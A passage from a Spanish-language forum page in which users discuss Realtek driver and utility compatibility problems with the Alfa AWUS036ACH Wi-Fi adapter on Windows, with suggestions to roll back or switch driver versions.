Hay varios reportes en el sitio de microsoft para problemas similares después actualizaciones drivers y/o sistema .
[email protected] por ejemplo solucionaron el asunto en windows 10 volviendo a los drivers de windows 8.1  (que en tu caso son los mismos que para windows 7)

#25 Re: Alfa Network » awus036ach windows: Asuntos compatibilidad drivers/utilidad realtek » 06-02-2019 01:59:41

Usa linux y olvídate de estas historias de bontocitos big_smile
Más en serio: Estamos desviando demasiado el hilo smile El tema no es para hablar de la GUI realtek sino del hardware en si mismo. 
Bueno... Haces clic y no funciona... ¿Qué puedes hacer?
  - Leer la ayuda y probar para ver si no hace falta habilitar o deshabilitar algo más para que el botón funcione.
Si después probar y leer el botón no funciona te quedan dos opciones:
  - Escribir a realtek para que pongan de vuelta el botón
  - Probas con otra versión de drivers y/o de uitilidad
Lo que no puedes hacer es modificar le código para arreglar el fallo
No veo que se te puede decir de más... En todos casos, si quieres seguir hablando de la GUI realteck o de la awus036ach específicamente en windows, hazlo en otro tema por favor.

Pie de página

Información del usuario

Ultimo usuario registrado: RanmaK2
Usuarios registrados conectados: 0
Invitados conectados: 14

Estadisticas de los foros

Número total de usuarios registrados: 1,393
Número total de temas: 1,272
Número total de mensajes: 13,052

Máx. usuarios conectados: 74 el 13-11-2018 18:47:20
Impulsado por FluxBB